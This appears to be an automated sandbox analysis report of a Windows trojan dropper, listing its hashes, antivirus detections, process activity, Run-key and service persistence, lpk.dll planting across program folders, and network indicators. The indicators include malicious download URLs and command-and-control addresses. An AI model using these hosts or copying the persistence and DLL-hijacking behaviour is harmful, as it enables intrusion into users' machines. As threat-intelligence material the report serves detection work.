Analysis Date: 2015-03-29 02:10:11
MD5: 5b324560d2718da8668d2f474d499fe5
SHA1: 96af660862739e96d81e07ad5111e54f63ece4aa

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: UPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section: UPX1 md5: 4df425296fd60a3822242916a9a3b59d sha1: 0b336627afb87ddcab43b0f745fb226b336fdd62 size: 36864
Section: .rsrc md5: b699d473496f7ce1447bb2661b40d864 sha1: a4883b92084a355ef57db2e1b8572aaf1d2da1d2 size: 10240
Timestamp: 2009-11-06 06:21:39
Packer: UPX -> www.upx.sourceforge.net
PEhash: 22fd5d3661574401736a1a1ee083601e69cd2567
IMPhash: 575ea90c069471216fa3adaba586119e
AV 360 Safe: no_virus
AV Ad-Aware: Dropped:Generic.ServStart.EB4C0F55
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): Dropped:Generic.ServStart.EB4C0F55
AV Authentium: W32/Agent.FI.gen!Eldorado
AV Avira (antivir): TR/Dldr.Agent.D0.3
AV BullGuard: Dropped:Generic.ServStart.EB4C0F55
AV CA (E-Trust Ino): Win32/Tnega.TD
AV CAT (quickheal): TrojanDropper.Crypter.fz.n3
AV ClamAV: Trojan.Dropper-22815
AV Dr. Web: Trojan.MulDrop.32183
AV Emsisoft: Dropped:Generic.ServStart.EB4C0F55
AV Eset (nod32): Win32/TrojanDropper.Agent.PIT
AV Fortinet: W32/Agent.PIT!tr
AV Frisk (f-prot): W32/Agent.FI.gen!Eldorado
AV F-Secure: Dropped:Generic.ServStart.EB4C0F55
AV Grisoft (avg): Generic18.CWT
AV Ikarus: Backdoor.Win32.Banito
AV K7: Trojan ( 0030b2a81 )
AV Kaspersky 2015: Trojan-Dropper.Win32.Agent.gato
AV MalwareBytes: Trojan.Dropper
AV Mcafee: generic!bg.fgl
AV Microsoft Security Essentials: Backdoor:Win32/Zegost.BZ
AV MicroWorld (escan): Dropped:Generic.ServStart.EB4C0F55
AV Rising: Dropper.Win32.Undef.uw
AV Sophos: Troj/Mdrop-CGE
AV Symantec: no_virus
AV Trend Micro: TROJ_AGENT.SMX
AV VirusBlokAda (vba32): Trojan.Win32.Genome.dfab

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\aaaa.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\server.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\aaaa.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\server.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c del C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe > nul

Creates File: nul
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\ksbinstaller_s_66_87703.e"

Creates Process: C:\PROGRA~1\COMMON~1\ksbinstaller_s_66_87703.e

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\UCBrowser_silent_782130248.exe"

Creates Process: C:\PROGRA~1\COMMON~1\UCBrowser_silent_782130248.exe

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\baidusd_silent_782130248.e"

Creates Process: C:\PROGRA~1\COMMON~1\baidusd_silent_782130248.e

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\qqpcmgr_silent_782"

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\pps_silent_782130248.exe"

Creates Process: C:\PROGRA~1\COMMON~1\pps_silent_782130248.exe

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\oqowKAVSETUPS_66_130903.exe"

Creates Process: C:\PROGRA~1\COMMON~1\oqowKAVSETUPS_66_130903.exe

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\haozip_silent_782130"

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\1.exe"

Creates Process: C:\PROGRA~1\COMMON~1\1.exe

Process
↳ cmd /c "C:\PROGRA~1\COMMON~1\baiduan_silent_782130248.e"

Creates Process: C:\PROGRA~1\COMMON~1\baiduan_silent_782130248.e

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\aaaa.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\QQmis.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\QQmis.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\server.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\admin ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\server.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ C:\PROGRA~1\COMMON~1\baiduan_silent_782130248.e

Process
↳ C:\PROGRA~1\COMMON~1\UCBrowser_silent_782130248.exe

Creates File: C:\WINDOWS\TEMP\scs7.tmp

Process
↳ C:\PROGRA~1\COMMON~1\pps_silent_782130248.exe

Creates File: C:\WINDOWS\TEMP\scs6.tmp

Process
↳ C:\PROGRA~1\COMMON~1\oqowKAVSETUPS_66_130903.exe

Creates File: C:\PROGRA~1\COMMON~1\OQOWKA~1.EXE
Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\TEMP\scs4.tmp
Creates File: C:\WINDOWS\TEMP\scs5.tmp
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Deletes File: C:\WINDOWS\TEMP\scs4.tmp
Deletes File: C:\WINDOWS\TEMP\scs5.tmp

Process
↳ C:\PROGRA~1\COMMON~1\1.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\TEMP\scs2.tmp
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\PROGRA~1\COMMON~1\1.EXE
Creates File: C:\WINDOWS\TEMP\scs3.tmp
Deletes File: C:\WINDOWS\TEMP\scs3.tmp
Deletes File: C:\WINDOWS\TEMP\scs2.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Pqrstu Wxyabcde Ghi\Description ➝ Pqrstuvw Yabcdefgh Jklmnop Rstuvwxy Bcd
Creates File: C:\WINDOWS\nwzvwy.exe
Creates Process: C:\WINDOWS\system32\cmd.exe /c del C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe > nul (10 times)
Creates Mutex: C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\coco.exe
Creates Service: Pqrstu Wxyabcde Ghijklmn Pqrs - C:\WINDOWS\nwzvwy.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\QQmis.exe

Creates File: C:\PROGRA~1\COMMON~1\baiduan_silent_782130248.e
Creates File: C:\PROGRA~1\COMMON~1\qqpcmgr_silent_782
Creates File: C:\PROGRA~1\COMMON~1\1.exe
Creates File: C:\PROGRA~1\COMMON~1\haozip_silent_782130
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\PROGRA~1\COMMON~1\ksbinstaller_s_66_87703.e
Creates File: C:\PROGRA~1\COMMON~1\pps_silent_782130248.exe
Creates File: C:\PROGRA~1\COMMON~1\baidusd_silent_782130248.e
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\PROGRA~1\COMMON~1\UCBrowser_silent_782130248.exe
Creates File: C:\PROGRA~1\COMMON~1\oqowKAVSETUPS_66_130903.exe
Creates Process: cmd /c "C:\PROGRA~1\COMMON~1\oqowKAVSETUPS_66_130903.exe"
Creates Process: cmd /c "C:\PROGRA~1\COMMON~1\1.exe"
Creates Process: cmd /c "C:\PROGRA~1\COMMON~1\haozip_silent_782130"
Creates Process: cmd /c "C:\PROGRA~1\COMMON~1\baidusd_silent_782130248.e"
Creates Process: cmd /c "C:\PROGRA~1\COMMON~1\qqpcmgr_silent_782"
Creates Process: cmd /c "C:\PROGRA~1\COMMON~1\pps_silent_782130248.exe"
Creates Process: cmd /c "C:\PROGRA~1\COMMON~1\UCBrowser_silent_782130248.exe"
Creates Process: cmd /c "C:\PROGRA~1\COMMON~1\ksbinstaller_s_66_87703.e"
Creates Process: cmd /c "C:\PROGRA~1\COMMON~1\baiduan_silent_782130248.e"
Winsock URL: http://download.58611.net:8181/baiduan/baiduan_silent_782130248.e
Winsock URL: http://download.58611.net:8181/qqPCTray_silent/qqpcmgr_silent_782
Winsock URL: http://www.fz1433.com/1.exe
Winsock URL: http://download.58611.net:8181/haozip_silent/haozip_silent_782130
Winsock URL: http://d.union.ijinshan.com/duba/link/oqowKAVSETUPS_66_130903.exe
Winsock URL: http://download.58611.net:8181/pps/pps_silent_782130248.exe
Winsock URL: http://d.union.ijinshan.com/liebao/link/ksbinstaller_s_66_87703.e
Winsock URL: http://download.58611.net:8181/uc/UCBrowser_silent_782130248.exe
Winsock URL: http://download.58611.net:8181/baidusd/baidusd_silent_782130248.e

Process
↳ Pid 804

Process
↳ Pid 848

Process
↳ Pid 1016

Process
↳ Pid 1116

Process
↳ Pid 1204

Process
↳ Pid 1292

Process
↳ Pid 1844

Process
↳ Pid 1636

Process
↳ C:\WINDOWS\nwzvwy.exe

Creates File: PIPE\DAV RPC SERVICE
Creates File: C:\Program Files\Windows Media Player\lpk.dll
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\lpk.dll
Creates File: C:\Program Files\Messenger\lpk.dll
Creates File: C:\Program Files\MSN Gaming Zone\Windows\lpk.dll
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\lpk.dll
Creates File: C:\Program Files\Windows NT\Accessories\lpk.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Temp\lpk.dll
Creates File: mm33.dll
Creates File: C:\Program Files\Common Files\Microsoft Shared\Speech\lpk.dll
Creates File: PIPE\wkssvc
Creates File: C:\Program Files\Outlook Express\lpk.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\lpk.dll
Creates File: C:\temp\lpk.dll
Creates File: C:\Program Files\Internet Explorer\lpk.dll
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\lpk.dll
Creates File: C:\RCX1.tmp
Creates File: \Device\Afd\Endpoint
Creates File: C:\Program Files\Windows NT\lpk.dll
Creates File: C:\lpk.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\lpk.dll
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\lpk.dll
Creates File: C:\Program Files\Internet Explorer\Connection Wizard\lpk.dll
Creates File: C:\Program Files\Movie Maker\lpk.dll
Creates File: C:\Program Files\Common Files\Microsoft Shared\MSInfo\lpk.dll
Creates File: C:\Program Files\Windows NT\Pinball\lpk.dll
Creates File: pipe\net\NtControlPipe10
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\lpk.dll
Creates File: C:\Program Files\Common Files\Microsoft Shared\DW\lpk.dll
Creates File: C:\Program Files\NetMeeting\lpk.dll
Deletes File: mm33.dll
Creates Mutex: Pqrstu Wxyabcde Ghi
Creates Mutex: C:\WINDOWS\nwzvwy.exe
Creates Mutex: DBWinMutex

Network Details:

DNS: 90f51169a3108215.cdn.fhldns.com (Type: A) ➝ 222.216.190.60
DNS: 90f51169a3108215.cdn.fhldns.com (Type: A) ➝ 61.155.149.76
DNS: tf01.dlmix.glb0.lxdns.com (Type: A) ➝ 8.37.235.12
DNS: tf01.dlmix.glb0.lxdns.com (Type: A) ➝ 8.37.234.9
DNS: tf01.dlmix.glb0.lxdns.com (Type: A) ➝ 8.37.234.10
DNS: tf01.dlmix.glb0.lxdns.com (Type: A) ➝ 8.37.234.11
DNS: tf01.dlmix.glb0.lxdns.com (Type: A) ➝ 8.37.234.12
DNS: tf01.dlmix.glb0.lxdns.com (Type: A) ➝ 8.37.235.9
DNS: tf01.dlmix.glb0.lxdns.com (Type: A) ➝ 8.37.235.10
DNS: tf01.dlmix.glb0.lxdns.com (Type: A) ➝ 8.37.235.11
DNS: download.58611.net (Type: A) ➝ 218.241.29.215
DNS: linfeng.sytes.net (Type: A)
DNS: www.fz1433.com (Type: A)
DNS: d.union.ijinshan.com (Type: A)
HTTP GET: http://www.fz1433.com/1.exe
User-Agent:
HTTP GET: http://d.union.ijinshan.com/duba/link/oqowKAVSETUPS_66_130903.exe
User-Agent:
HTTP GET: http://d.union.ijinshan.com/liebao/link/ksbinstaller_s_66_87703.e
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 1.93.10.147:7777
Flows TCP: 192.168.1.1:1031 ➝ 1.93.10.147:7777
Flows TCP: 192.168.1.1:1034 ➝ 216.99.157.163:8080
Flows TCP: 192.168.1.1:1043 ➝ 216.99.157.163:8080
Flows TCP: 192.168.1.1:1052 ➝ 216.99.157.163:8080
Flows TCP: 192.168.1.1:1054 ➝ 1.93.10.147:7777
Flows TCP: 192.168.1.1:1062 ➝ 216.99.157.163:8080
Flows TCP: 192.168.1.1:1071 ➝ 216.99.157.163:8080
Flows TCP: 192.168.1.1:1076 ➝ 1.93.10.147:7777
Flows TCP: 192.168.1.1:1081 ➝ 216.99.157.163:8080
Flows TCP: 192.168.1.1:1090 ➝ 216.99.157.163:8080
Flows TCP: 192.168.1.1:1098 ➝ 1.93.10.147:7777
Flows TCP: 192.168.1.1:1100 ➝ 216.99.157.163:8080
Flows TCP: 192.168.1.1:1102 ➝ 222.216.190.60:80
Flows TCP: 192.168.1.1:1110 ➝ 216.99.157.163:8080
Flows TCP: 192.168.1.1:1117 ➝ 8.37.235.12:80
Flows TCP: 192.168.1.1:1120 ➝ 216.99.157.163:8080
Flows TCP: 192.168.1.1:1123 ➝ 1.93.10.147:7777
Flows TCP: 192.168.1.1:1125 ➝ 8.37.235.12:80
Flows TCP: 192.168.1.1:1131 ➝ 216.99.157.163:8080
Flows TCP: 192.168.1.1:1133 ➝ 218.241.29.215:8181

Raw Pcap

Strings